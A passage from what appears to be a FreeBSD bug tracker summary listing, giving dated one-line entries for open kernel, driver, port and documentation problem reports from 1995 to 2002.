"MAC address" can't be acquired properly. o [2001/10/31] kern/31659 n_hibma USB controller driver will die after some o [2001/10/31] bin/31661 jasone pthread_kill signal handler doesn't get s f [2001/10/31] misc/31670 Wide-Ultra 10k SCSI 3 drive is not recogn o [2001/10/31] bin/31678 A bug in handling an error reading a CD-R f [2001/11/01] ports/31688 znerd JDK 1.3.1 Update for Sun's Java Communica f [2001/11/01] ports/31689 znerd JDK 1.3.1 update for FreeBSD/Java Commapi f [2001/11/01] bin/31692 2872-or-less-byte ftp binary transfer fro o [2001/11/01] ports/31699 ports The graphics/gd2 port conflicts with grap f [2001/11/03] misc/31736 DMA mode not possible switching to PIO mo o [2001/11/03] kern/31746 failed connect(2) seems to cause problems o [2001/11/05] kern/31768 darrenr Use of fastroute in IPFilter reboots the o [2001/11/05] i386/31771 brian PPP compares CHAP81 response case sensiti o [2001/11/05] kern/31790 problem with NFS and jail() o [2001/11/05] ports/31793 billf snmpd loops on udp.ipv6UdpTable.ipv6UdpEn o [2001/11/06] kern/31804 Clearing PME mode kills network performan o [2001/11/07] ports/31819 jmz ports/ispell install doesn't work o [2001/11/07] bin/31835 murray dhclient doesn't close FD's before spawni o [2001/11/07] bin/31837 qa sysinstall change mountpoint o [2001/11/07] kern/31839 mdodd ex0 panic if NIC not cabled a [2001/11/07] ports/31840 portmgr package naming inadequation (gnome vs gtk o [2001/11/07] i386/31845 Toshiba Satellite 2105CDS won't boot Free o [2001/11/08] bin/31860 read wont timeout on sockets if using thr o [2001/11/08] misc/31864 system header file attempts to redefine a o [2001/11/09] ports/31893 des gnats-3.113.1 conflicts with /usr/bin/sen o [2001/11/12] gnu/31929 GNU Tar shipped with FreeBSD handles rela o [2001/11/12] kern/31940 nge gigabit adapter link reset and slow t o [2001/11/13] i386/31967 reboot/shutdown hangs on Sony VAIO 505 w/ o [2001/11/14] kern/31979 Setup and boot locks Compaq Armada E500 l f [2001/11/17] ports/32063 znerd patch for /usr/ports/java/linux-jdk about o [2001/11/17] bin/32072 setuid w/o immutable flag o [2001/11/18] kern/32098 semctl() does not propagate permissions o [2001/11/19] kern/32118 21143 with dc driver will not select 10ba o [2001/11/19] ports/32121 jmz xf86cfg 4.1.0 writes bad "Chipset" value o [2001/11/20] kern/32124 Cannot set 128 bit wep key on prism2 (wi0 a [2001/11/21] ports/32164 skv New port: p5-XML-SAX-Simple-0.01 f [2001/11/21] bin/32175 green ssh-keygen -p core dumps o [2001/11/22] misc/32194 Adaptec SCSI RAID 2100 fails by reboot o [2001/11/22] bin/32205 brian PPP login fails in LCP negotiation on opt o [2001/11/23] ports/32223 znerd Port databases/mysql-jdbc-mm is quite out o [2001/11/23] kern/32226 time of day clock runs fast (approx twice o [2001/11/23] ports/32234 portmgr Perl ports not $LOCALBASE clean o [2001/11/24] kern/32256 System crash/reboot when deleting file on o [2001/11/24] bin/32261 dump creates a dump file much larger than o [2001/11/26] alpha/32289 alpha memory management fault o [2001/11/26] bin/32295 pthread dont dequeue signals o [2001/11/26] misc/32297 sound Scratchy sound, bad hiss with ALS4000 bas f [2001/11/27] kern/32331 system panic in quotaoff o [2001/11/27] kern/32338 Network to disk write performance low und o [2001/11/28] kern/32353 if kern.maxproc > 512 sybase ASE 11.9.2( o [2001/11/28] gnu/32365 obrien gcc optimiser bug with -O -march=i686 o [2001/11/29] bin/32374 vi -r doesn't work, file contained unexpe o [2001/12/03] ports/32465 ports emulators/vmware2 doesn't build o [2001/12/03] ports/32471 ports amavis-perl only usable for sendmail o [2001/12/03] ports/32476 skv New port: oracle7-client o [2001/12/03] ports/32477 skv New port: p5-DBD-Oracle-1.12 o [2001/12/04] ports/32524 kde Port build failed: x11-toolkits/qt23 o [2001/12/05] ports/32529 kde Konqueror 2.2.2 refuses to follow some li o [2001/12/06] kern/32556 sound system crashes when unloading sound modul o [2001/12/06] ports/32558 olgeni www/sitecopy is broken o [2001/12/07] ports/32589 dirk mod_php4 configure script fails o [2001/12/07] bin/32591 assar The memory block doubly freed in Heimdal o [2001/12/08] kern/32600 luigi [PATCH] incorrect handling of parent rule o [2001/12/08] bin/32619 des libfetch does not use RFC 1738's definito o [2001/12/08] misc/32631 imp installing 4.4 "mounting root from ufs:/d o [2001/12/09] ports/32663 kde kdelibs2 port potentially conflicts with o [2001/12/10] kern/32668 peter NFS directory removal problems manifested f [2001/12/10] bin/32686 wosch locate command dumps a core file with bro o [2001/12/11] misc/32699 Tulip ether card EN2242 (if_dc.c) use wro o [2001/12/11] ports/32700 assar inode changes for large o [2001/12/11] kern/32716 system hangs when running vid (usb webcam o [2001/12/11] bin/32717 brian ppp(8) change mss to wrong size o [2001/12/12] bin/32759 [PATCH] make(1) System V include behaviou o [2001/12/12] misc/32760 Please MFC /usr/include/malloc.h to -STAB f [2001/12/12] bin/32791 ru FreeBSD's man(1) utility vulnerable to ol o [2001/12/13] kern/32797 Problem with IPX and netgraph(4) o [2001/12/13] ports/32800 dec gated dies on ppp interface up/down o [2001/12/13] kern/32809 yet another panic while syncing disks aft o [2001/12/13] bin/32817 tobez Base system includes outdated CGI module o [2001/12/14] kern/32827 small SO_RCVTIMEO values are taken to be o [2001/12/14] ports/32832 kde Kmail 1.3.2 / kde 2.2.1 / PGP 6.5.8 - kma o [2001/12/14] ports/32844 kde exiting konq term emulator causes crash o [2001/12/16] ports/32903 ports Kernel panic when returning from single m o [2001/12/16] misc/32924 dmlb raylink driver having problems receiving o [2001/12/18] ports/32963 skv New port: p5-Class-ISA-0.32 o [2001/12/18] ports/32965 skv New port: p5-Class-BlackHole-0.03 o [2001/12/18] ports/32966 skv New port: p5-Ima-DBI-0.26 o [2001/12/18] ports/32967 skv New port: p5-Class-WhiteHole-0.03 o [2001/12/18] ports/32968 skv New port: p5-Class-DBI-0.36 o [2001/12/18] ports/32970 skv New port: p5-XML-DBMS-1.01.3 o [2001/12/18] ports/32974 skv New port: p5-Math-SimpleVariable-0.03 o [2001/12/18] ports/32975 skv New port: p5-Math-LinearCombination-0.03 o [2001/12/19] ports/33001 skv New port: p5-PodParser-1.18 o [2001/12/19] ports/33002 skv New port: p5-Pod-POM-0.11 o [2001/12/21] kern/33074 joe USB printer support does not detect print o [2001/12/21] ports/33080 ume grkrellmvolume interferes with the abilit o [2001/12/21] ports/33082 ports audio/mxv fails to compile o [2001/12/22] kern/33085 jlemon Samba's NMBD cannot find alias interface o [2001/12/22] ports/33093 jdp cvsup SNAP_16_1e breaks by SIGILL during o [2001/12/24] kern/33138 pnp problem in 4.3, 4.4, 4.5 o [2001/12/24] kern/33143 Kernel panic in uhci_abort_xfer_end o [2001/12/24] bin/33155 green [PATCH] sshd can leave hanging processes o [2001/12/25] ports/33170 ache zip -T [zip file] fails with message abou o [2001/12/26] kern/33201 net/net_osdep.c:if_name is broken o [2001/12/26] kern/33206 sound Soundcard f [2001/12/26] misc/33213 ume rarpd fails to init IPv6 enabled interfac o [2001/12/27] kern/33234 luigi dummynet localhost pipe causes machine to o [2001/12/27] bin/33235 find terminates with "find: fts_read: Per o [2001/12/30] kern/33344 memory leak in device resource config loa o [2001/12/30] kern/33346 jhb Kernel panic with SMP kernel o [2001/12/30] kern/33353 panic at odd times...idle, under no load, o [2001/12/30] misc/33370 Post configuration issue o [2002/01/01] ports/33440 portmgr Ports can not resume an interrupted downl o [2002/01/02] kern/33464 dillon soft update inconsistencies after system o [2002/01/03] bin/33515 amd incorrectly handles multi-homed nfs s o [2002/01/03] ports/33519 portmgr make index fails if PERL_VERSION is 5.6.1 o [2002/01/03] ports/33522 jkh Cvsupit out of date, RELENG_4 or RELENG_4 o [2002/01/04] kern/33532 sound Playing audio on some soundcards with pcm o [2002/01/04] kern/33535 invalid kernel diagnostic while writing d f [2002/01/04] gnu/33551 cvs chokes on OpenBSD repositories f [2002/01/05] kern/33578 FreeBSD panics when accessing encrypted D o [2002/01/07] ports/33650 kde py-numeric, koffice, others are hard code o [2002/01/07] kern/33653 DSL PPPoE connection error on 4.5-PRERELE o [2002/01/07] misc/33672 sheldonh telnetd and mount_mfs signal handlers cal o [2002/01/08] kern/33712 joe Duplicate make_dev panic in ugen.c + patc p [2002/01/09] misc/33723 select(2) implementation in threaded (-lc o [2002/01/09] kern/33738 argv == NULL is not handled correctly by o [2002/01/12] conf/33810 murray /etc/ttys: document how to make console i o [2002/01/13] kern/33833 Correct kernel config for 4.4-RELEASE is o [2002/01/13] kern/33839 joe usb0: host controller halted (involving A o [2002/01/13] ports/33848 ports CUPS doesn't find parallel port o [2002/01/14] bin/33881 adduser additions: selectable crypt schem o [2002/01/15] ports/33927 ports ja-dvipdfm port requires texmf/dvips/base o [2002/01/15] ports/33929 doc Section 15.15 of the FreeBSD Porter's Han o [2002/01/15] ports/33931 mbr trouble installing StarOffice 5.2 over li o [2002/01/16] kern/33940 quotactl allows compromise gid-quotas o [2002/01/16] kern/33974 Can not record anything with emu10k1 on 4 f [2002/01/17] kern/33978 can't kill process o [2002/01/17] i386/33986 sound SMP and audio causes hard lockups (random o [2002/01/17] bin/34007 pkg_create -b forgets to include install o [2002/01/17] kern/34017 The siginfo_t passed to the signal handli o [2002/01/18] kern/34020 programs fail that poll(2) on fifos o [2002/01/18] bin/34030 miibus.ko can be loaded into the kernel w o [2002/01/18] kern/34031 hang with linux emulation in 4.5-RC o [2002/01/18] i386/34033 Suspend doesn't work on Dell Latitude CPx o [2002/01/18] ports/34056 ports vmware2 complains of missing file o [2002/01/19] bin/34072 semenu corrupted transfers on mounted ntfs parti f [2002/01/19] misc/34073 3com 3c980c runs "bursty" / freezes-unfre o [2002/01/20] i386/34092 reboot hangs the system (IBM PC Server 31 o [2002/01/21] ports/34110 des linux-opera TP3 doesn't work o [2002/01/21] gnu/34128 sdiff "e" doesn't work with some editors o [2002/01/21] ports/34153 andreas The apsfilter configure script adds bzip2 o [2002/01/23] kern/34205 joe detect USB memory device, But can not use o [2002/01/23] ports/34212 cpiazza Segmentation fault in audio/gmixer o [2002/01/24] kern/34228 Dual processor machine hangs at reboot o [2002/01/24] gnu/34246 joe CVS doesn't rebuild CVSROOT/options o [2002/01/25] kern/34266 SMP does not work on CPQ0579 System board o [2002/01/25] i386/34267 semenu FreeBSD hangs and reboots when overloaded o [2002/01/25] bin/34269 tcpdump -v incorectly identifies packets o [2002/01/25] misc/34270 man -k could be used to execute any comma f [2002/01/26] kern/34306 gibbs 4.5-RC panics on boot with half-supported o [2002/01/26] ports/34308 ports perl build fails due to locales (*.ISO885 o [2002/01/26] ports/34318 se ports/games/rt2-demo-files/do-install has o [2002/01/29] ports/34409 kuriyama prc-tools from ports fails to compile on f [2002/01/29] i386/34422 crash system wnen kill pppd with reattach o [2002/01/30] misc/34458 green 4.5S/sshd forwarding problems o [2002/01/30] ports/34467 portmgr bsd.port.mk is broken WRT USE_AUTOCONF_VE o [2002/01/31] ports/34480 jmz system hangs after killing xinit o [2002/02/01] i386/34536 accept() blocks other threads o [2002/02/01] bin/34539 [PATCH] fsck(8) doesn't account for negat o [2002/02/01] kern/34544 Kernel crash on fclose() of /dev/kbd1 whe o [2002/02/02] ports/34558 sobomax wxgtk-devel port broken o [2002/02/02] misc/34568 turning printer on and off hangs the comp o [2002/02/03] kern/34582 wpaul Support for D-Link DFE-690TXD Cardbus PC o [2002/02/03] bin/34586 burncd -t blank blanks CD o [2002/02/03] i386/34588 read-prefetch on VIA 686B IDE causes hang a [2002/02/03] bin/34601 sheldonh bc(1)'s multi-line file parsing problem o [2002/02/04] kern/34619 TCP - FINs with different sequence number o [2002/02/06] kern/34672 NEWCARD panic. o [2002/02/06] bin/34682 fenner scanf/sscanf doesn't understand %lld o [2002/02/06] i386/34684 qa sysinstall core-dumped o [2002/02/07] ports/34691 ports new port for sfs - the self-certifying fi o [2002/02/07] bin/34725 sos burncd cannot write audio file as the 1st o [2002/02/07] bin/34727 ``/bin/mkdir -p /'' fails o [2002/02/08] ports/34730 ports new port qmail-scanner - a virus-scanning o [2002/02/08] bin/34741 pkg_info -R gives empty output o [2002/02/09] kern/34764 cisco aironet driver freezes with toshiba o [2002/02/09] kern/34765 Unloading the ipl.ko module will panic th o [2002/02/10] kern/34801 TCP window size bug (afflicting IP Filter o [2002/02/10] bin/34811 sh: "jobs" is not pipeable o [2002/02/11] misc/34842 VmWare port + NIS causes "broadcast storm o [2002/02/12] ports/34872 ports New Port: KOggTag is a KDE-based tag edit o [2002/02/12] ports/34893 deischen RUS-CERT Advisory 2002-02:01: Temporary f o [2002/02/12] kern/34895 Linuxulator linux_fcntl64() doesn't handl o [2002/02/13] i386/34902 FTP session causes server reboot o [2002/02/13] ports/34907 sf 4.5/ports/ftp/wget+ipv6 hangs top make o [2002/02/14] ports/34943 ports ports/mail/ecartis o [2002/02/15] ports/34990 kde Kde coredump on halt o [2002/02/16] kern/35004 [PATCH] Fix for pcm driver lockups o [2002/02/17] kern/35061 After printing to HP Deskjet 656c USB pri a [2002/02/18] bin/35076 maxim sh builtin test command sets real uid to o [2002/02/18] kern/35081 zebra routing problem - kernel bug??? o [2002/02/18] bin/35087 TAR does not recurse directories if it ru o [2002/02/18] misc/35104 Files end up being no bigger than 8192 by o [2002/02/19] misc/35116 keyinfo reports root's keyinfo f [2002/02/19] ports/35121 ade msgfmt in multiple ports causes conflicts o [2002/02/20] kern/35136 VLAN & bridging & MTU o [2002/02/20] misc/35145 cannot open /etc/termcap and no terminal o [2002/02/21] ports/35179 kris elm-2.5.5_1: bounce command doesn't work o [2002/02/21] ports/35183 portmgr postgresql-7.1 repo copy request o [2002/02/22] ports/35209 nakai icewm 1.0.9 crashes o [2002/02/22] bin/35214 dump program hangs while exiting o [2002/02/22] ports/35218 ports WRKDIRPREFIX while /usr/obj exists o [2002/02/23] ports/35237 ports empty manpage installed by trafcount port o [2002/02/23] kern/35248 panic: ffs_valloc: dup alloc o [2002/02/23] misc/35267 after cvsup src-all for 4.5, /stand/sysin o [2002/02/24] ports/35288 ports ports/afterstep has resources leak o [2002/02/25] bin/35307 standard include files are not standard c o [2002/02/25] ports/35308 dirk mod_php4 port will not configure (version o [2002/02/25] bin/35309 umount -f does not work for ufs floppy o [2002/02/25] misc/35310 SSHing with expired password does not bri o [2002/02/25] ports/35320 znerd linux-jdk-1.4 JVM fails when running Tomc o [2002/02/25] bin/35321 standard include files do not comply to s o [2002/02/25] ports/35325 ports gtk_set_locale patch for ports/x11-fonts/ o [2002/02/25] bin/35329 Linking against libc_r.* provokes nasty l o [2002/02/26] misc/35350 Can't boot on ASUS TXP4 o [2002/02/26] kern/35351 emu10k1: no posibility to record sound. K o [2002/02/26] ports/35353 green cfs strips eighth bit of file name on "ou o [2002/02/26] ports/35364 ports cdb port forgets uint32.h o [2002/02/27] ports/35386 ports doxygen port will not configure o [2002/02/27] ports/35388 ports xsane_create_secure_file fails if file ex o [2002/02/27] kern/35396 poll(2) doesn't set POLLERR for failed co o [2002/02/28] kern/35399 poll(2) botches revents on dropped socket o [2002/02/28] kern/35425 System hang while boot on specific SMP mo f [2002/02/28] ports/35426 dirk lang/php4 does not patch o [2002/02/28] kern/35429 select(2)/poll(2)/kevent(2) can't/don't n o [2002/02/28] ports/35434 ports Apache 1.3.23 + mod_ssl 2.8.7 and PHP 4.1 o [2002/02/28] kern/35442 Problem transmitting runts in if_sis driv o [2002/03/01] alpha/35455 alpha Unable to compile ISA NIC devices into ke o [2002/03/01] kern/35461 trap 12 when booting with Maxtor 160G dis o [2002/03/02] kern/35482 dc driver uses wrong case to read MAC fro o [2002/03/03] misc/35506 innetgr() doesn't match wildcard fields i o [2002/03/03] kern/35511 sis(4) multicast filtering doesn't pass s o [2002/03/03] ports/35515 steve open-motif-2.1.30_2 installation deletes o [2002/03/03] ports/35517 ports New port: MySQL 4.0 o [2002/03/04] bin/35538 ssh can hang waiting for EOF on stdin o [2002/03/05] ports/35570 ports aureal-kmod ports has invalid Makefile o [2002/03/05] ports/35579 ports New port: phpsysinfo o [2002/03/06] docs/35620 doc make release fails in documentation for R o [2002/03/07] bin/35622 sigaltstack is missing in libc_r o [2002/03/07] ports/35631 ports SKIP and IPSEC together cause kernel pani o [2002/03/07] ports/35632 ports linux-realplayer RPM files location o [2002/03/07] kern/35645 Layer 2 switching using default router of o [2002/03/07] misc/35662 send-pr and/or web pr query system screws o [2002/03/08] kern/35669 NFSROOT breaks without a gateway o [2002/03/08] docs/35678 doc docproj Makefiles for web are broken for o [2002/03/08] ports/35690 ports patch: sort master sites for x11-servers o [2002/03/08] kern/35691 Realtek NIC driver does not work with Rea o [2002/03/09] kern/35703 /proc/curproc/file returns unknown o [2002/03/09] kern/35720 Patch to vr(4) to fix network load proble o [2002/03/09] docs/35724 doc www; Handbook missing link to important H o [2002/03/10] i386/35742 USB 2.0 attached device cannot be fdisk'd o [2002/03/10] kern/35756 USB reattach of Sony DSC-S75 fails, USB s o [2002/03/11] misc/35774 [SECURITY] Suboptimal auditing possibilit o [2002/03/11] ports/35775 dwcjr mail/postfix: not started at boot time on o [2002/03/11] ports/35777 des www/linux-opera does not install with lin o [2002/03/11] ports/35778 ports www/linux-netscape47-navigator does not i o [2002/03/11] ports/35780 ports Update port: russian/fortuneru o [2002/03/12] alpha/35815 alpha Can't install 4.5 for Alpha from the 4.5- o [2002/03/12] ports/35822 ports gnu-radius path fixes o [2002/03/12] bin/35842 rm -f nonexistent file successful but rm o [2002/03/13] bin/35843 maxim [PATCH] MD5 auth implemented in routed is o [2002/03/13] ports/35850 dirk mod_php4 doesn`t compile when apache2 ins o [2002/03/13] kern/35873 recent -STABLE dhclient doesn't see wirel o [2002/03/13] gnu/35878 /usr/bin/strip resets ABI type to FreeBSD o [2002/03/13] conf/35880 rc files could be a bit more jail friendl o [2002/03/14] kern/35887 ipfw(8) limit feature does not work prope o [2002/03/14] ports/35907 gnome Attempts to build mozilla fail (on curren o [2002/03/15] bin/35921 Wrong path reduction of dot-dot paths in o [2002/03/15] misc/35924 signal.h does not check for _POSIX_REALTI o [2002/03/15] bin/35925 fixit floppy cannot be mounted on USB dri a [2002/03/15] docs/35940 keramida red(1) manual doesn't explain red(1). a [2002/03/16] kern/35985 re swap double mount o [2002/03/16] kern/35986 Wrong bpf-header preceading packet when u o [2002/03/16] kern/35989 720KB floppies unusable o [2002/03/17] kern/36002 compile is stopped without DDB define o [2002/03/17] i386/36003 Cyclades Cyclom YeP causes panics on Free o [2002/03/17] kern/36038 sheldonh sendfile(2) on smbfs fails, exposes kerne o [2002/03/18] kern/36056 atapicd driver won't boot with cdr-cdroms o [2002/03/18] kern/36057 atacontrol, apm, kernel panic o [2002/03/18] ports/36071 portmgr devel/autoconf213: eliminate file conflic o [2002/03/18] ports/36077 portmgr devel/automake14: fix info file overlap w o [2002/03/19] misc/36086 Kerberos Problem/Handbook wrong/Followup o [2002/03/19] ports/36107 greid Update Port: devel/zziplib (to 0.10.27) o [2002/03/19] ports/36123 portmgr seemingly bogus run-time dependency on mk o [2002/03/19] ports/36124 obrien build of vim5 fails when compiled w/ perl p [2002/03/20] bin/36141 greid sh dumps core o [2002/03/20] ports/36144 ports New port: pinepgp-0.17.3 o [2002/03/20] kern/36147 bogus irq 7 message being issued o [2002/03/21] ports/36159 ports under XFree 4.2 + FreeBSD 4.5-STABLE , en o [2002/03/21] kern/36160 Kernel halts while trying to detect CD-C6 o [2002/03/21] ports/36163 dwcjr security/saint port fails to download cor o [2002/03/21] bin/36167 _THREAD_SAFE & _REENTRANT used inconsiste o [2002/03/21] docs/36168 doc -pthread/_THREAD_SAFE docs missing in gcc o [2002/03/21] bin/36175 Vsnprintf causes memeory leak o [2002/03/22] ports/36193 gnome www/mozilla: make -DWITHOUT_CHATZILLA => o [2002/03/22] kern/36204 cannot install -STABLE from CD-ROM Drive o [2002/03/22] kern/36209 read() system call never returns in some o [2002/03/22] kern/36219 poll() behaves erratic on BPF file descri o [2002/03/22] kern/36220 panic: sched_sync: fsync failded vp 0xcf4 o [2002/03/23] ports/36237 portmgr registering _real_ dependencies in bsd.po o [2002/03/24] ports/36258 jmz new XFree86-4 port errors o [2002/03/25] kern/36300 acd0c: 'device not configured ' after sta o [2002/03/25] ports/36303 dirk Apache with mod_php4 wont run if mod_php4 o [2002/03/25] kern/36309 [patch] Wrong mnt_iosize_max calculation o [2002/03/25] ports/36314 dirk mod_php4 configure.php script options are o [2002/03/25] kern/36315 panic: vm_fault on nofault entry while ru o [2002/03/26] kern/36329 reference of unexistent object o [2002/03/26] ports/36352 ports Postfix ports do not build TLS when speci o [2002/03/26] ports/36353 tg lang/python{15,20,21} stomps on man pg, b o [2002/03/26] ports/36363 ports apache13-ssl - default'httpsd.conf' lack o [2002/03/27] ports/36387 ports BitchX-gnome-1.0c18 fails to build due to o [2002/03/27] ports/36393 nakai [Update] x11-wm/qvwm to 1.1.12 o [2002/03/27] ports/36398 obrien x11-toolkits/open-motif-devel: make error o [2002/03/27] ports/36401 gnome devel/bonobo: can't make package because o [2002/03/27] ports/36411 glewis java/jdk13 not owner/group safe o [2002/03/28] kern/36413 the bktr driver tries to destroy device a o [2002/03/28] kern/36415 the bktr driver incorrectly handles the s o [2002/03/28] ports/36434 jmz Unable to build XFree86-4 a [2002/03/28] i386/36451 roger (sys/dev/bktr) Japan IF frequency is inco o [2002/03/29] ports/36472 kde Unable to build KDE2 - Konq problem o [2002/03/29] bin/36473 Overdue MFC's in chmod/chown/chflags o [2002/03/29] kern/36482 Multiport starfire card (sf/ukphy) doesn' o [2002/03/29] ports/36484 ports Windowmaker 0.80.0 should be marked with f [2002/03/29] ports/36505 ade Nessus-core compile fails /usr/libexec/el o [2002/03/29] conf/36508 installation floppy bug (See description) s [2002/03/29] ports/36516 dwcjr MAINTAINER UPDATE: delete print/texinfo, o [2002/03/29] i386/36517 sis driver can't map ports/memory for Net o [2002/03/29] kern/36522 stat outside procs in procfs succeeds fro o [2002/03/29] ports/36526 ports xfce help file images not shown o [2002/03/30] ports/36554 netchild ports/lang/icc requires linux_devtools to o [2002/03/30] docs/36563 doc fdisk(8) program doesn't honor -t (test) o [2002/03/31] ports/36565 ports x11/XFree86-4-libraries doesn't install e o [2002/03/31] kern/36566 System reboot with dead smb mount and umo o [2002/03/31] kern/36603 X crashes o [2002/03/31] kern/36605 [PATCH] vm_zone: zinitna failure leaves z o [2002/04/01] kern/36610 acd0: MODE_SENSE_BIG command timeout - re o [2002/04/01] docs/36642 doc 4.5 man page on ipfw new option limit is o [2002/04/01] gnu/36643 Perl 5.6.1 not configured properly for -C o [2002/04/01] i386/36647 There is no suitable driver for SURECOM E o [2002/04/02] ports/36653 ports [PATCH] x11/gdkxft compile failure o [2002/04/02] ports/36663 ports chinese/mutt install failed o [2002/04/02] i386/36675 current kernel build broken in smbfs o [2002/04/03] kern/36708 panic: ufs_dirbad: bad dir during pkg_inf o [2002/04/03] ports/36711 ports Configure Bug: cyrus-sasl-1.5.27_2 / krb o [2002/04/03] i386/36718 install boot before sysinstall halts ata1 o [2002/04/04] i386/36761 Symbol problems dependant on boot method, s [2002/04/04] ports/36772 ports smtpd incompatible with newest sendmail o [2002/04/04] docs/36773 doc Unclear/inconsistent instructions in Hand o [2002/04/05] kern/36784 Can't fcntl(fd, F_SETFL, ...) on a pseudo o [2002/04/05] ports/36789 ports openssh port will not compile, checksum e o [2002/04/05] kern/36790 kernel panic in biodone() on boot o [2002/04/05] docs/36796 doc make release fails because of revision 1. o [2002/04/05] ports/36798 kuriyama p5-Mail-Tools 1.43 needs upgrade to fix s o [2002/04/05] ports/36800 ports tvision 0.8 port upgrade breaks libh o [2002/04/05] ports/36804 ports portupgrade of apache13+modssl causes cer o [2002/04/06] ports/36811 ports XFree86-4-libraries cannot find version.d o [2002/04/06] kern/36813 un-bzero'd sin_zero causes bind() in PF_I o [2002/04/06] ports/36816 ports x11/wdm's configure intends to find -lpam o [2002/04/06] ports/36819 ports /usr/ports/x11/XFree86-4 compilation trou o [2002/04/06] ports/36820 ports Security: upgrade www/horde and mail/imp o [2002/04/06] ports/36826 ports x11-servers/XFree86-4-Server: xf86cfg -te o [2002/04/07] ports/36838 ports MICO update to 2.3.7 o [2002/04/07] ports/36843 nik auth_ldap port fix o [2002/04/07] docs/36844 doc Wrong link to top logo on Russian WWW (da o [2002/04/07] ports/36846 ports fxtv 1.03 freezes the system when $LANG=d o [2002/04/07] ports/36851 ports print/lyx hangs when pasting a big text f o [2002/04/07] kern/36858 The USB flash drive "Apacer HandyDrive" c o [2002/04/07] kern/36863 References to vm_zone.h still exist. o [2002/04/07] bin/36867 games/fortune: add FORTUNE_PATH env var, o [2002/04/08] kern/36876 Weird read-errors while accessing data fr o [2002/04/08] ports/36879 ports emulators/vmware2 freezes and reboots sys o [2002/04/08] ports/36885 ports XFree86-4-libraries cannot find version.d o [2002/04/08] ports/36888 dirk [Patch] www/mod_php4 (xmlrpc requires ico o [2002/04/08] ports/36907 ports ports/www/apache2 deinstall may need upda o [2002/04/08] ports/36910 ports netpbm port: URTLIB_DIR should be defined o [2002/04/08] conf/36911 installation floppies miss autoload file o [2002/04/09] ports/36925 gnome bonobo-1.0.19 does not compile, type Dyna o [2002/04/09] bin/36926 send-pr destroys PR if emacs interrupt ch o [2002/04/09] ports/36934 olgeni nessus port only builds on 4.5 or -curren o [2002/04/09] i386/36943 reboot hangs on Tyan Thunder K7 with SMP o [2002/04/09] kern/36953 linux emulation does not work well on SMP o [2002/04/09] ports/36954 ports PostgreSQL daylight savings fix... o [2002/04/10] ports/36988 glewis java/jdk13 build fails on 5-current o [2002/04/11] i386/36991 Installing gnome from packages over the n o [2002/04/11] misc/36999 2 Default Routes Created o [2002/04/11] ports/37005 vanilla Broken build of /usr/ports/graphics/gimp1 o [2002/04/11] ports/37006 dirk cdrecord does not work with Teac USB CDRW o [2002/04/12] bin/37026 FBSD4.5/4.4 sshd coredump, for unexisting o [2002/04/12] docs/37029 doc The translation in Italian language of th o [2002/04/13] kern/37035 [PATCH] msdosfs_readdir() freezes after f o [2002/04/13] kern/37043 Latest stable causes SCSI bus freeze on s o [2002/04/14] kern/37057 Problem with rlimits on filesystem mounte o [2002/04/14] ports/37072 gnome GnuCash-1.6.6 won't build: libguppi inluc o [2002/04/14] ports/37085 ports apsfilter/ghostscript don't work with hpi o [2002/04/15] docs/37099 doc The translation in Italian language of th o [2002/04/15] bin/37104 truss(1) does not print strings from stac 921 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- f [1995/01/11] i386/105 Distributed libm (msun) has non-standard s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p s [1995/11/20] kern/831 one minor complaint about the kernel visu a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases a [1996/07/07] bin/1375 eivind Extraneous warning from mv(1) [PATCH] s [1996/10/13] misc/1791 tegge syslimits.h does not allow overriding def f [1996/10/20] bin/1849 gdb sets library breakpoints on the wrong s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/12/02] bin/2137 tegge vm statistics are bad s [1996/12/14] bin/2216 [PATCH] Ada specs not being compiled into o [1996/12/24] kern/2273 dufault support for POSIX.4 / POSIX.1a RT-schedul s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d s [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/10] bin/2934 cracauer sh(1) has problems with $ENV s [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) f [1997/04/07] bin/3221 rpc.rusersd : can't communicate with SunO o [1997/04/14] bin/3284 mikeh [PATCH] symorder(1): -t option doesn´t wo a [1997/05/08] gnu/3552 the -L option of tar does not work proper f [1997/05/16] bin/3608 jkoshy Telnet in linemode will break apart long o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) f [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/24] kern/3944 paul if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 jlemon nonworking t/tcp server side o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to s [1997/07/26] bin/4172 des suggest reconnection option added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk f [1997/08/07] kern/4243 file locking doesn't work for pipe o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 portmgr Recommendation re. Ports Collection o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 man can display the same man page twice o [1997/08/29] bin/4420 roberto find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta f [1997/09/13] kern/4528 processes hang if the mount_portal proces o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 qa Can't fixit with an NFS-mounted CD. o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts o [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/24] kern/4845 Boot complains about disk slices in FAT p f [1997/11/08] bin/4975 quotaon while server very busy causes loc o [1997/11/13] bin/5031 gad lpr does not remove original file if -s i s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with o [1998/01/11] bin/5483 Login(1) clears 